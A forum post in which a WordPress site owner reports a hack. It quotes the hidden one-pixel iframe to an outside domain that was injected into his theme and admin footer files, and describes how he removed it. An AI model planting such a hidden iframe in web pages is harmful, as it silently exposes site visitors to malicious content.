verneho

I got rid of it in the afternoon and checking now, it’s still gone. I’ll post an update if I see it come back.

I wanted to resurface this thread because I just discovered the exact same problem today on my site that runs 2.3.3.

I was getting messages from people telling me that my site (creativebriefing.com) was crashing their browsers. One person even told me that their anti-virus picked up on something from my site.

I checked out the source code of my site to see if there was anything unusual. At the very bottom, right before the </body> tag was the following:

<iframe src=https://googlerank.info width=1 height=1 style=display:none></iframe>

To fix this, I re-uploaded my theme’s footer.php file, and reloaded the page. The above line of code was gone.

I then logged into my dashboard, and to be safe, checked the source code again (I remember my dashboard mysteriously crashing a few times last week). To my surprise, the same line of code appeared at the bottom of the source. To fix this, I re-uploaded admin-footer.php into my /wp-admin/ directory.

I checked the CHMOD for the directory and the files, and they were both set to 644, which means they weren’t writeable.

Furthermore, I updated my theme after I had updated to 2.3.3, which means that the ‘hack’ definitely happened in the last 2 weeks or so (and wasn’t just left over from 2.2.2).

Most people probably have had this happen to their site but have no idea (my site worked fine for me about 99.9% of the time). I encourage you to take a look to make sure it hasn’t already happened.

Now the question is, how did it happen? It doesn’t seem like the get_footer() function was comprimised as suggested above, since re-uploading the theme’s footer.php file takes care of the unwanted code. However, the idea of get_header() creating a cookie to pass on to get_footer() is a bit scary.

If anybody can shed some light and experience on this, that would be great.

Thanks,

Verne